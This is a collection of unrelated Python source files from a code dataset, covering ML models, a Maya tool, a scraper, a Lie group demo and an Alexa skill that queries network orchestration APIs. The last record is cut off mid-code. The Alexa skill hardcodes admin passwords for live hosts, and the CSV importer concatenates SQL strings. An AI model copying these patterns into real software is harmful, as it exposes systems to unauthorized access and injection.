{"seq_id":"98982744","text":"vowels = ['a', 'e', 'i', 'o', 'u']\nword = \"swaroop\"\nfound = []\nprint(\"looking for vowels in word:\", word)\nfor l in word:\n    if l in vowels:\n        if l not in found:\n            found.append(l)\nif len(found) > 0:\n    print(\"Found below vowels\")\n    for v in found:\n        print(v)\nelse:\n    print(\"No vowels found in word:\", word)\n","sub_path":"chapter-2/vowels2.py","file_name":"vowels2.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"268049232","text":"# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\n\nclass ASR_Model():\n\n    def __init__(self, class_num):\n        '''----------------------------------------------------------------------------------------------------------------------------------'''\n\n        self.Conv2D_1 = tf.keras.layers.Conv2D(\n            32, kernel_size=(2, 2),\n            padding='same', activation='relu'\n        )\n\n        self.batch_norm_1 = tf.keras.layers.BatchNormalization(\n            fused=False)\n\n
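        # (editor note) the 2x2 max pooling below halves both axes of the assumed\n        # time-frequency (spectrogram) input before the deeper conv layers; usage\n        # sketch (assumption): model = ASR_Model(class_num=10).call(tf.keras.Input(shape=(T, F, 1)))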
self.MaxPooling2D_1 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))\n\n self.Conv2D_2 = tf.keras.layers.Conv2D(\n 64, kernel_size=(2, 2),\n padding='same', activation='relu'\n )\n\n self.batch_norm_2 = tf.keras.layers.BatchNormalization(fused=False)\n\n self.MaxPooling2D_2 = tf.keras.layers.MaxPooling2D(pool_size=(2, 2))\n\n self.Conv2D_3 = tf.keras.layers.Conv2D(\n 128, kernel_size=(1, 1), padding='same'\n )\n\n self.Conv2D_4 = tf.keras.layers.Conv2D(\n 256, kernel_size=(1, 1), padding='same'\n )\n\n self.dense_1 = tf.keras.layers.Dense(1024)\n\n self.flatten = tf.keras.layers.Flatten()\n\n self.ouput_layer = tf.keras.layers.Dense(\n class_num, activation='softmax')\n\n def __gen_nn_structure(self, inputs):\n\n self.Conv2D_1 = self.Conv2D_1(inputs)\n self.batch_norm_1 = self.batch_norm_1(self.Conv2D_1)\n self.MaxPooling2D_1 = self.MaxPooling2D_1(self.batch_norm_1)\n self.Conv2D_2 = self.Conv2D_2(self.MaxPooling2D_1)\n self.batch_norm_2 = self.batch_norm_2(self.Conv2D_2)\n # self.MaxPooling2D_2 = self.MaxPooling2D_2(self.batch_norm_2)\n self.Conv2D_3 = self.Conv2D_3(self.batch_norm_2)\n self.l2_norm = tf.math.l2_normalize(\n self.Conv2D_3,\n axis=-1,\n epsilon=1e-12,\n name='l2norm',\n )\n self.Conv2D_4 = self.Conv2D_4(self.l2_norm)\n self.flatten = self.flatten(self.Conv2D_4)\n\n last_layer = self.ouput_layer(self.flatten)\n\n return tf.keras.Model(inputs=inputs, outputs=last_layer)\n\n def call(self, inputs):\n\n x = self.__gen_nn_structure(inputs=inputs)\n\n return x\n","sub_path":"ASR_Model.py","file_name":"ASR_Model.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"272471236","text":"import json, os, base64, random\nimport boto3\nfrom boto3.dynamodb.conditions import Key\nfrom Crypto.PublicKey import RSA\nfrom Crypto.Cipher import PKCS1_OAEP\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Hash import SHA256\n\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n \n if event['httpMethod'] == 'OPTIONS':\n return {\n \"statusCode\": 200,\n 'headers': {\n \"Access-Control-Allow-Headers\" : \"content-type\",\n \"Access-Control-Allow-Origin\" : \"*\"\n }\n }\n\n body = json.loads(event['body'])\n id = body['id']\n alias = body['alias']\n otp = body['otp']\n\n output = ''\n\n session_key_table = dynamodb.Table(os.environ['SESSION_KEY_TABLE'])\n\n # row = sessionKeyTable.query(KeyConditionExpression=Key('id').eq(id))['Items'][0]\n row = session_key_table.get_item(Key={'id': id})['Item']\n\n\n session_key = row['key']\n length = int(row['length'])\n\n sha256 = base64.b64encode(SHA256.new(base64.b64decode(session_key.encode('ascii'))).digest()).decode('ascii')\n output = otp == sha256[:length]\n\n if output:\n session_key_table.update_item(Key={\"id\": id}, UpdateExpression=\"set authenticated = :b\", ExpressionAttributeValues={':b': True})\n\n return {\n \"statusCode\": 200,\n \"body\": json.dumps({\n \"success\": output\n }),\n 'headers': {\n \"Access-Control-Allow-Headers\" : \"content-type\",\n \"Access-Control-Allow-Origin\" : \"*\"\n }\n }\n","sub_path":"SeQRe-API/functions/authenticate_session/authenticate_session.py","file_name":"authenticate_session.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"279231745","text":"from PySide2 import QtCore\nfrom PySide2 import QtGui\nfrom PySide2 import QtWidgets\nimport maya.OpenMayaUI as omui\nfrom shiboken2 import 
wrapInstance\nimport maya.OpenMaya as om\nimport pymel.core as pm\nimport maya.cmds as cmds\n\ndef maya_main_weindow():\n main_window_ptr = omui.MQtUtil.mainWindow()\n return wrapInstance(long(main_window_ptr), QtWidgets.QWidget)\n\n\nclass openImportWin(QtWidgets.QDialog):\n\n # 默认过滤器\n FILE_FILTERS = 'Maya (*.ma *.mb);;Maya ASCII (*.ma);;Maya Binary (*.mb);;ALL Files (*.*)'\n selected_filter = 'Maya (*.ma *.mb)'\n\n def __init__(self, parent=maya_main_weindow()):\n super(openImportWin, self).__init__(parent)\n\n self.setWindowTitle('Open/Import/Reference')\n self.setMinimumSize(300, 80)\n self.setWindowFlags(self.windowFlags() ^ QtCore.Qt.WindowContextHelpButtonHint)\n\n self.create_widgets()\n self.create_layout()\n self.create_connections()\n\n def create_widgets(self):\n self.fileoath_le = QtWidgets.QLineEdit()\n self.select_file_path_btn = QtWidgets.QPushButton()\n self.select_file_path_btn.setIcon(QtGui.QIcon(':fileOpen.png')) # 按钮图标的添加\n self.select_file_path_btn.setToolTip('select_file') # 按钮功能提示\n\n self.open_rb = QtWidgets.QRadioButton('Open')\n self.open_rb.setChecked(True)\n self.import_rb = QtWidgets.QRadioButton('Import')\n self.reference_rb = QtWidgets.QRadioButton('Reference')\n self.force_cb = QtWidgets.QCheckBox('Force')\n self.apply_btn = QtWidgets.QPushButton('Apply')\n self.close_btn = QtWidgets.QPushButton('Close')\n\n def create_layout(self):\n file_path_layout = QtWidgets.QHBoxLayout()\n file_path_layout.addWidget(self.fileoath_le)\n file_path_layout.addWidget(self.select_file_path_btn)\n\n radio_btn_layout = QtWidgets.QHBoxLayout()\n radio_btn_layout.addWidget(self.open_rb)\n radio_btn_layout.addWidget(self.import_rb)\n radio_btn_layout.addWidget(self.reference_rb)\n\n form_layout = QtWidgets.QFormLayout()\n form_layout.addRow('File:', file_path_layout)\n form_layout.addRow('', radio_btn_layout)\n form_layout.addRow('', self.force_cb)\n\n button_layout = QtWidgets.QHBoxLayout()\n button_layout.addWidget(self.apply_btn)\n button_layout.addWidget(self.close_btn)\n\n main_layout = QtWidgets.QVBoxLayout(self)\n main_layout.addLayout(form_layout)\n main_layout.addLayout(button_layout)\n\n def create_connections(self):\n self.select_file_path_btn.clicked.connect(self.show_file_select_dialog)\n self.open_rb.toggled.connect(self.update_force_vis)\n self.apply_btn.clicked.connect(self.load_file)\n\n self.close_btn.clicked.connect(self.close)\n\n def show_file_select_dialog(self):\n # 打开一个窗口获取路径,过滤器的使用\n file_paht, self.selected_filter = QtWidgets.QFileDialog.getOpenFileName(self, 'select_file', '', self.FILE_FILTERS, self.selected_filter)\n if file_paht:\n self.fileoath_le.setText(file_paht)\n\n def update_force_vis(self, checked):\n self.force_cb.setVisible(checked)\n\n def load_file(self):\n file_path = self.fileoath_le.text()\n if not file_path:\n return\n file_info = QtCore.QFileInfo(file_path)\n if not file_info.exists():\n om.MGlobal.displayError('File does not exist : {}'.format(file_path))\n return\n \n if self.open_rb.isChecked():\n self.open_file(file_path)\n elif self.import_rb.isChecked():\n self.import_file(file_path)\n else:\n self.reference_file(file_path)\n \n def open_file(self, file_path):\n force = self.force_cb.isChecked()\n if not force and cmds.file(q=True, modified=True):\n result = QtWidgets.QMessageBox.question(self, 'modified', 'not save ???')\n if result == QtWidgets.QMessageBox.StandardButton.Yes:\n force = True\n cmds.file(file_path, open=True, ignoreVersion=True, force=force)\n \n \n def import_file(self, file_path):\n cmds.file(file_path, 
    def import_file(self, file_path):\n        cmds.file(file_path, i=True, ignoreVersion=True)\n    \n    def reference_file(self, file_path):\n        cmds.file(file_path, reference=True, ignoreVersion=True)\n\n\nif __name__ == \"__main__\":\n    try:\n        ui.close()\n        ui.deleteLater()\n    except:\n        pass\n    ui = openImportWin()\n    ui.show()\n","sub_path":"PySide/20190808/open_import_reference_tool/2019_08_07_05文件导入案例v01.py","file_name":"2019_08_07_05文件导入案例v01.py","file_ext":"py","file_size_in_byte":4496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"300470164","text":"import sys\nimport json\nimport operator\n\ntry:\n\topen('summed_values.txt', 'x')\t# Tries to create the file\nexcept:\n\tpass\nf = open('summed_values.txt', 'r+')\ncontents = f.read()\nf.close()\nif(contents == \"\"):\n\tscores = {}\nelse:\n\tcontents = contents.replace(\"'\", '\"')\t# Python requires double quotes\n\tscores = json.loads(contents)\n\ndone_inputting = False\nwhile(not done_inputting):\n\tai_names = input(\"\\nPlease input AI names in format: '[<name1>, <name2>, ...]' (enter x to stop)\\n\")\n\tavg_points = input(\"Please input average points in format: '[<points1>, <points2>, ...]' (enter x to stop)\\n\")\n\n\tif(ai_names == 'x' or avg_points == 'x'):\n\t\tdone_inputting = True\n\t\tbreak\n\n\t# Remove brackets and split by commas\n\tai_names = ai_names[1:-1].split(',')\n\tavg_points = avg_points[1:-1].split(',')\n\n\t# Sum up the scores per AI name\n\tfor i in range(0, len(ai_names)):\n\t\tai_name = ai_names[i]\n\t\tif ai_name in scores:\n\t\t\tscores[ai_name] += float(avg_points[i])\n\t\telse:\n\t\t\tscores[ai_name] = float(avg_points[i])\n\n# Note: converts to list so don't write this to the file. Only for display purposes\nsorted_scores = sorted(scores.items(), key=operator.itemgetter(1), reverse=True)\nprint(\"Average Points so far:\")\nfor score in sorted_scores:\n\tprint(\"\\t\" + score[0] + \": \" + str(score[1]))\n\nf = open('summed_values.txt', 'w')\nf.write(str(scores))\nf.close()","sub_path":"sumUpPoints.py","file_name":"sumUpPoints.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"456084312","text":"import cv2\n\n# loading default face detector xml for face detection training\ntraining_data = cv2.CascadeClassifier(cv2.data.haarcascades + \"haarcascade_frontalface_default.xml\")\n\n# loading test image\nimg = cv2.imread(\"test-image.jpg\")\n\n# converting image to grayscale\ngrayscale_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n# getting face coordinates on the image\nface_coordinates = training_data.detectMultiScale(grayscale_img)\n\n# marking faces with rectangular border\nfor (x, y, w, h) in face_coordinates:\n\tcv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0))\n\n# showing the annotated image on screen\ncv2.imshow(\"Showing Loaded Image\", img)\n\n# holding screen so users can view image\ncv2.waitKey()\n\n\n","sub_path":"face-detector.py","file_name":"face-detector.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"244305347","text":"i = 0\na, b = map(int, input().split())\na1 = 0\nb1 = 0\nst = 1\nr = 0\nwhile i == 0:\n    comand = input()\n    if comand == \"forward\":\n        a1 += st\n    elif comand == \"right\":\n        a1, b1 = b1, a1\n        if st == -1:\n            st = -st  # was 'st == -st', a no-op comparison instead of an assignment\n        r += 1\n    elif comand == \"left\":\n        a1, b1 = b1, a1\n        if st == 1:\n            st = -st\n        r -= 1\n    elif comand == \"turn around\":\n        st = -st  # was 'st = -1', which could not undo a second U-turn\n    elif comand == \"stop\":\n        if r % 2 == 0:\n            i += 1\n            print(\"You found the treasure! It is located at\", a1, b1)\n
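        # An odd number of quarter turns (r) leaves the robot's axes swapped,\n        # so the coordinates are printed in reverse order below.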
        else:\n            i += 1\n            print(\"You found the treasure! It is located at\", b1, a1)\n    else:\n        print(\"No such command\")\n    \n","sub_path":"ex2/Пракическая2.py","file_name":"Пракическая2.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"64671475","text":"\n## Multiple large CSV files --> SQLite\n\nfrom tkinter import *\nfrom tkinter.simpledialog import *\nfrom tkinter.filedialog import *\nimport csv\nimport json\nimport os\nimport os.path\nimport xlrd\nimport xlwt\nimport sqlite3\nimport pymysql\nimport glob\n\ncon = sqlite3.connect('c:/temp/userDB')\ncur = con.cursor()\n\n# Select a folder and collect the list of CSV files inside it.\ndirName = askdirectory()\nfile_list = glob.glob(os.path.join(dirName,\"*.csv\"))\n\n# Save each file into SQLite (one table per file).\nfor input_file in file_list :\n    filereader = open(input_file, 'r', newline='')\n    csvReader = csv.reader(filereader)\n    colList = next(csvReader)  # column names\n    tableName = os.path.basename(input_file).split(\".\")[0]\n    try :\n        sql = \"CREATE TABLE \" + tableName + \"(\"\n        for colName in colList :\n            cList = colName.split()\n            colName = ''\n            for col in cList :\n                colName += col + '_'\n            colName = colName[:-1]\n            sql += colName + \" CHAR(20),\"\n        sql = sql[:-1]\n        sql += ')'\n        print(sql)\n        cur.execute(sql)\n    except :\n        print('Table creation failed -->', input_file)\n        #continue\n\n    for rowList in csvReader :\n        sql = \"INSERT INTO \" + tableName + \" VALUES(\"\n        for data in rowList :\n            sql += \"'\" + data + \"',\"\n        sql = sql[:-1] + ')'\n        cur.execute(sql)\n\n    filereader.close()\n    con.commit()\n\ncur.close()\ncon.close()\nprint(\"OK!\")\n","sub_path":"csv_SQLite_save_direct.py","file_name":"csv_SQLite_save_direct.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"295273271","text":"import matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport numpy.linalg as la\nfrom scipy.linalg import expm\n\n\ndef Rot3d(rpy):\n    \"\"\"\n    Transform a roll, pitch, yaw into a rotation matrix\n    ASSUMES body/relative rotations, i.e. 
\"rzyx\"\n :param rpy: roll, pitch, yaw\n :return: rotation matrix\n \"\"\"\n cx = np.cos(rpy[0])\n sx = np.sin(rpy[0])\n cy = np.cos(rpy[1])\n sy = np.sin(rpy[1])\n cz = np.cos(rpy[2])\n sz = np.sin(rpy[2])\n rot = np.array((\n [cx * cy, -sx * cz + sy * sz * cx, sx * sz + sy * cx * cz],\n [sx * cy, cx * cz + sx * sy * sz, -sz * cx + sx * sy * cz],\n [-sy, sz * cy, cy * cz]))\n\n return rot\n\n\ndef plotFrame(ax, pts, alpha=.3, tip='k'):\n # plots a RGB frame thing\n colors = ['r', 'g', 'b']\n for pt, color in zip(pts.T, colors):\n ax.plot([0, pt[0]],\n [0, pt[1]],\n [0, pt[2]],\n color=color, alpha=alpha)\n ax.scatter(*pt, color=tip) # put balls on the tips\n\n\nclass so3Grp(object):\n # a member, X, of the lie group so3\n def __init__(self, X):\n # make a member of the group\n self.X = X\n # asset we hold the group constraint\n # for numerics we have || X'X -I || < 1e-4\n assert la.norm(np.dot(X.T, X) - np.eye(3)) < 1e-4\n\n def __repr__(self):\n # prints the group member\n return self.X.__repr__()\n\n def inv(self):\n # reurns the inverse group member z* such that z*z=I\n return so3Grp((self.X).T) # cuz orthogonal matrix\n\n def mult(self, Z):\n # return a member from group_opp(self, z)\n Y = self.X.dot(Z.X)\n return so3Grp(Y)\n\n def step(self, v):\n # v is a member of the lie algebra (tanget space at the identy)\n # we want make a step of v at self\n v_local = v.adj(self) # convert step in global frame to local frame\n v_group = v_local.exp() # map to manifold\n return self.mult(v_group)\n\n def plot(self, ax, frame, alpha=.3, tip='k'):\n # plot a frame at the rotaiton\n frame_R = self.X.dot(frame)\n plotFrame(ax, frame_R, alpha, tip)\n\n\nclass so3Alg(object):\n # a member of the lie algabra of so3\n def __init__(self, w):\n # make the member\n # w is in R3 and is a preterbation about each axis\n self.w = w # vector space\n\n # W is the member of the algebra and is a skew sym matrix\n self.W = np.array([[0., -w[2], w[1]],\n [w[2], 0, -w[0]],\n [-w[1], w[0], 0]])\n\n def __repr__(self):\n # print the member\n return self.W.__repr__()\n\n def vee(self):\n # returns a memeber of the associated VECTOR space\n return self.w\n\n def exp(self):\n # map the lie algebra member to the corresponding lie group member\n X = expm(self.W)\n return so3Grp(X)\n\n def adj(self, Z):\n # Z is a member of the partent lie group\n # Z * self.W * Z.inv\n # sorry for the overload of matrix opps, blame numpy\n Z_inv = Z.inv()\n W_global = np.dot(Z_inv.X, self.W.dot(Z.X))\n # print(W_global) # need to extract w\n w_global = [W_global[2, 1], W_global[0, 2], W_global[1, 0]]\n\n return so3Alg(w_global)\n\n\nif __name__ == '__main__':\n\n Rtest1 = Rot3d([.1, .2, .2]) # about z, about y, about x\n Rtest2 = Rot3d([.0, .2, 0])\n frame = np.array([[1., 0., 0.],\n [0., 1., 0.],\n [0., 0., 1.]])\n\n A = so3Grp(Rtest1)\n B = so3Grp(Rtest2)\n C = A.mult(B)\n fig = plt.figure(figsize=(8, 6))\n ax = fig.add_subplot(111, projection='3d')\n\n # c.plot(ax, frame, alpha=1)\n plotFrame(ax, frame, alpha=.5)\n\n v = so3Alg([0, .8, 0]) # algebra\n V = v.exp() # group\n # print(vx)\n # print(v.W)\n AV_world = A.step(v)\n AV_body = A.mult(V)\n\n # should be the same as AV_world\n VA_world = V.mult(A)\n\n A.plot(ax, frame, tip='r')\n # V.plot(ax, frame, tip='b')\n\n # plot\n AV_body.plot(ax, frame, tip='g')\n AV_world.plot(ax, frame, tip='c')\n VA_world.plot(ax, frame, tip='m')\n\n print(AV_world)\n print(VA_world)\n\n\n # plotted for style\n\n ax.set_xlim([-2, 2])\n ax.set_ylim([-2, 2])\n ax.set_zlim([-2, 2])\n ax.set_xlabel(\"x\")\n 
ax.set_ylabel(\"y\")\n ax.set_zlabel(\"z\")\n plt.show()\n","sub_path":"so3.py","file_name":"so3.py","file_ext":"py","file_size_in_byte":4405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"525798386","text":"import requests\nimport json\nimport os\nfrom bs4 import BeautifulSoup\nimport codecs\n# from multiprocessing import Pool\nimport time\nfrom multiprocessing.dummy import Pool as ThreadPool\n\nCHARTER_CARD_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=card&id4='\nCHARTER_LINKS_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=links&id4='\nCHARTER_DOCUMENT_TEXT_PATTERN = 'http://zakon.scli.ru/ru/legal_texts/list_statutes/index.php?do4=document&id4='\n\nMUNICIPAL_CARDS_PATH = 'html/municipal_cards/'\n\nCHARTER_CARDS_PATH = 'html/chater_cards/'\ncharter_links_path = 'html/chater_links/'\ncharter_text_path = 'html/chater_texts/'\n\n\ndef load_html(url, filename, card_link=None):\n # if os.path.isfile(filename):\n # filesize = round(os.path.getsize(filename) / 1024, 1)\n # if filesize > 10:\n # print(filename, 'already exits', 'status ok')\n # return\n # else:\n # print(filename, 'already exits', 'status failed')\n\n # existed_filename = filename.split('/')[0] + '/' + filename.split('/')[1].split('_')[0] + '.html'\n #\n # # print(existed_filename)\n # if os.path.isfile(existed_filename):\n # # print(filename, 'already exits')\n # os.rename(existed_filename, filename)\n # return\n\n # override wrong id numbers\n correct_filename = filename.split('/')[0] + '/' + \\\n filename.split('/')[1].split('_')[0] + '_' + filename.split('/')[1].split('_')[1] + '/' + \\\n filename.split('/')[2].split('_')[0] + \\\n '_' + card_link + '.html'\n\n print(correct_filename)\n if os.path.isfile(filename):\n try:\n print(filename, 'already exits')\n os.rename(filename, correct_filename)\n except:\n os.remove(filename)\n return\n\n # # print(url)\n # r = requests.get(url, stream=True)\n # with open(filename, 'wb') as f:\n # for chunk in r.iter_content(chunk_size=1024):\n # if chunk:\n # f.write(chunk)\n #\n # load_html(url, filename)\n\n\ndef create_dir(dir_path):\n if not os.path.exists(dir_path):\n os.makedirs(dir_path)\n\n\ndef foo(html):\n if html.endswith('.html'):\n # print(html)\n with codecs.open(MUNICIPAL_CARDS_PATH + html, 'r') as f:\n document = BeautifulSoup(f.read(), \"lxml\")\n # for td in document.findAll('td', {'class':'search_result_cell'}):\n # print(td.findAll('a'))\n\n try:\n card_link = list(filter(lambda x: x.findAll('a'), document.findAll('', {'align': 'center'})))[0]\n card_link = card_link.findAll('a')[0]['href']\n card_link = card_link.split('id4=')[1]\n\n load_html(CHARTER_CARD_PATTERN + card_link, CHARTER_CARDS_PATH + html, card_link)\n load_html(CHARTER_DOCUMENT_TEXT_PATTERN + card_link, charter_text_path + html, card_link)\n load_html(CHARTER_LINKS_PATTERN + card_link, charter_links_path + html, card_link)\n\n # print(card_link)\n except:\n # print('Пустой')\n pass\n\ncreate_dir(CHARTER_CARDS_PATH)\ncreate_dir(charter_links_path)\ncreate_dir(charter_text_path)\n\npool = ThreadPool(8)\n\npool.map(foo, os.listdir(MUNICIPAL_CARDS_PATH))\n\n# for html in os.listdir(preview_html_path):\n# if html.endswith('.html'):\n# print(html)\n# with codecs.open(preview_html_path + html, 'r') as f:\n# document = BeautifulSoup(f.read(), \"lxml\")\n# # for td in document.findAll('td', {'class':'search_result_cell'}):\n# # print(td.findAll('a'))\n#\n# try:\n# card_link = list(filter(lambda x: 
x.findAll('a'), document.findAll('', {'align': 'center'})))[0]\n#                 card_link = card_link.findAll('a')[0]['href']\n#                 card_link = card_link.split('id4=')[1]\n#\n#                 load_html(CHARTER_CARDS_PATH + CHARTER_CARD_PATTERN + card_link)\n#                 load_html(charter_text_path + CHARTER_DOCUMENT_TEXT_PATTERN + card_link)\n#                 load_html(charter_links_path + CHARTER_LINKS_PATTERN + card_link)\n#\n#                 print(card_link)\n#             except:\n#                 print('Empty')\n\npool.close()\npool.join()\n\nprint('finish')","sub_path":"charter_html_loader.py","file_name":"charter_html_loader.py","file_ext":"py","file_size_in_byte":4343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
{"seq_id":"540487277","text":"# -*- coding: utf-8 -*-\nimport random\n\nimport logging\n\nfrom typing import Union, List\n\nfrom ask_sdk.standard import StandardSkillBuilder\nfrom ask_sdk_core.dispatch_components import (AbstractRequestHandler, AbstractExceptionHandler,AbstractRequestInterceptor, AbstractResponseInterceptor)\nfrom ask_sdk_core.handler_input import HandlerInput\nfrom ask_sdk_core.utils import is_request_type, is_intent_name\nfrom ask_sdk_model.services.monetization import (EntitledState, PurchasableState, InSkillProductsResponse, Error,InSkillProduct)\nfrom ask_sdk_model.interfaces.monetization.v1 import PurchaseResult\nfrom ask_sdk_model import Response, IntentRequest\nfrom ask_sdk_model.interfaces.connections import SendRequestDirective\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n# Data for the skill\n\n# Static list of facts across 3 categories that serve as\n# the free and premium content served by the Skill\nall_facts = [\n    {\n        \"type\": \"science\",\n        \"fact\": \"The current status of NSO is:\"\n    },\n    ]\n\nskill_name = \"Infinity Labs\"\n\n# Utility functions\n\ndef get_all_entitled_products(in_skill_product_list):\n    \"\"\"Get list of in-skill products in ENTITLED state.\"\"\"\n    # type: (List[InSkillProduct]) -> List[InSkillProduct]\n    entitled_product_list = [ l for l in in_skill_product_list if (l.entitled == EntitledState.ENTITLED)]\n    return entitled_product_list\n\ndef get_random_from_list(facts):\n    \"\"\"Return the fact message from randomly chosen list element.\"\"\"\n    # type: (List) -> str\n    fact_item = random.choice(facts)\n    return fact_item.get(\"fact\")\n\ndef get_random_yes_no_question():\n    \"\"\"Return random question for YES/NO answering.\"\"\"\n    # type: () -> str\n    questions = [\n        \"Do you want to know about the currently available automation packages, devices and VPNs....... or do you want to create a new VPN service?\"\n    ]\n    return random.choice(questions)\n    \ndef create_service():\n    \"\"\"Prompt for a new VPN service name and list the devices it can use.\"\"\"\n    # type: () -> str\n    import json\n    import time\n    import requests\n    code= requests.get(\"http://203.122.19.100:6661/api/operational/devices\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n    y = code.json()\n    w=y['tailf-ncs:devices']\n    m=w['device']\n    x=json.dumps(m)\n    db=json.loads(x)\n    items = []\n    for item in db:\n        items.append(item['name'])\n    return \"Please provide the new vpn name....\",items\n    \ndef check_status():\n    import json\n    import time\n    import requests\n    code= requests.get('http://203.122.19.100:6661/api/running',auth=(\"admin\",\"admin\"))\n    if (code.status_code == 200):\n        return \"The current status of the Orchestrator is: running.......\"\n    else:\n        return \"The Orchestrator is currently not running...........\"\n    \ndef package_info():\n    import requests\n    import time\n    import 
json \n    code= requests.get(\"http://203.122.19.100:6661/api/operational/packages\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n    y = code.json()\n    w=y['tailf-ncs:packages']\n    m=w['package']\n    x=json.dumps(m)\n    db=json.loads(x)\n    items = []\n    for item in db:\n        items.append(item['name'])\n    return \"Current available packages are..\",items\n    \ndef welcome_script():\n    return \"A guest welcome script will be provided shortly; for any other question, the answer will be as below:\"\n\n\n###################################################################\n#####################  SDDEV INFORMATION  #########################\n###################################################################\n\n\ndef sddevdevice_info():\n    import requests\n    import time\n    import json\n    response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n    res = response.json()\n    x = json.dumps(res)\n    db = json.loads(x)\n    y=db[\"token\"]\n    xyz= 'Bearer '+y\n    code = requests.get(\"http://sddev.infinitylabs.in/api/devices\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n    v=code.json()\n    i=v['data']\n    g = json.dumps(i)\n    db = json.loads(g)\n    items = []\n    for item in db:\n        items.append(item['name'])\n    return \"Current running devices are\", items\n# print(sddevdevice_info())\n\n\ndef sddevsites_info():\n    import requests\n    import time\n    import json\n    response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n    res = response.json()\n    x = json.dumps(res)\n    db = json.loads(x)\n    y=db[\"token\"]\n    xyz= 'Bearer '+y\n    code = requests.get(\"http://sddev.infinitylabs.in/api/sites\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n    v=code.json()\n    i=v['data']\n    g = json.dumps(i)\n    db = json.loads(g)\n    items = []\n    for item in db:\n        items.append(item['name'])\n    return \"Current running sites are\", items\n# print(sddevsites_info())\n\n\ndef sddevpid_count():\n    import requests\n    import time\n    import json\n    response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n    res = response.json()\n    x = json.dumps(res)\n    indexY = 0\n    db = json.loads(x)\n    y=db[\"token\"]\n    xyz= 'Bearer '+y\n    code = requests.get(\"http://sddev.infinitylabs.in/api/licenses\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n    v=code.json()\n    i=v['data']\n    g = json.dumps(i)\n    db = json.loads(g)\n    items = []\n    for item in db:\n        items.append(item['plid'])\n        indexY= indexY + 1\n    return indexY\n\n# Module-level smoke test; kept disabled so that importing this Lambda\n# module does not trigger network calls at cold start.\n# print(sddevpid_count())\n\n\ndef sddevuser_count():\n    import requests\n    import time\n    import json\n    response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n    res = response.json()\n    x = json.dumps(res)\n    indexY = 0\n    db = json.loads(x)\n    y=db[\"token\"]\n    xyz= 'Bearer '+y\n
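    # The login endpoint returns a JWT in \"token\"; every subsequent API call\n    # passes it back as a Bearer token in the Authorization header.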
requests.get(\"http://sddev.infinitylabs.in/api/users/0\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n #print(len(db['data'][0]['plid']\n items = []\n for item in db:\n items.append(item['username'])\n indexY= indexY + 1\n \n \n return indexY\n #return \"Current running users are\", indexY\n #print(len(db['data'][0]['plid']\n #print(len(db['data'][0]['plid'])\n#print(indexY)\n#print(sddevdevice_info())\nx= sddevuser_count()\nprint(x)\n\n\n\ndef sddevactivelicense_count():\n \n import requests\n import time\n import json\n response = requests.post(\"http://sddev.infinitylabs.in/api/login/\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\"}, data = \"username=admin&password=admin@123\")\n res = response.json()\n x = json.dumps(res)\n indexY = 0\n db = json.loads(x)\n y=db[\"token\"]\n xyz= 'Bearer '+y\n code = requests.get(\"http://sddev.infinitylabs.in/api/licenses\", headers={\"Content-Type\": \"application/x-www-form-urlencoded\", 'Authorization': xyz})\n v=code.json()\n i=v['data']\n g = json.dumps(i)\n db = json.loads(g)\n #print(len(db['data'][0]['plid']\n items = []\n for item in db:\n if item['license']['isActive'] :\n indexY= indexY + 1\n \n \n return indexY\n return \"Current running Active licenses are\", indexY\n #print(len(db['data'][0]['plid']\n #print(len(db['data'][0]['plid'])\n#print(indexY)\n#print(sddevdevice_info())\nx= 